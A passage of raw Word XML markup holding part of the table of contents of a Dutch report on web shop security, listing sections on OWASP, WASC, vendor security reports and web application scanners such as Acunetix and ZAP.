              <w:instrText xml:space="preserve"> PAGEREF _Toc491022057 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2771C272" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022058" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Inleiding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022058 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="523D577F" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022059" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Web security en de kwetsbaarheden</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022059 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="165272F0" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022060" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1 OWASP top 10 lijst</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022060 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="741025D2" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022061" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2 OWASP Selectie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022061 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A87D1D1" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022062" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3 WASC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022062 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37890163" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022063" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Rapporten Online Webshops</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022063 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E07113A" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022064" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1 Inleiding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022064 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="102CA4E1" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022065" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2 IBM Security 2016</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022065 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BBE182B" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022066" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>3.3.3 Symantec rapport 2017</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022066 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66B1E796" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022067" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.4 Sucuri rapport</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022067 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="520E47A6" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022068" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Web Applicatie Scanner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022068 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08DF8333" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022069" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1 Inleiding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022069 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01B8F17B" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022070" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.2 Beschikbare Web Applicatie Scanners</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022070 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F14A6C5" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022071" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.4 Acunetix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022071 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="464E980E" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022072" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>3.4.5 Zap Zed Attack Proxy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022072 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="502C1C50" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022073" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>3.4.6 Testen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022073 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="474710FD" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022074" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.7 Conclusie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
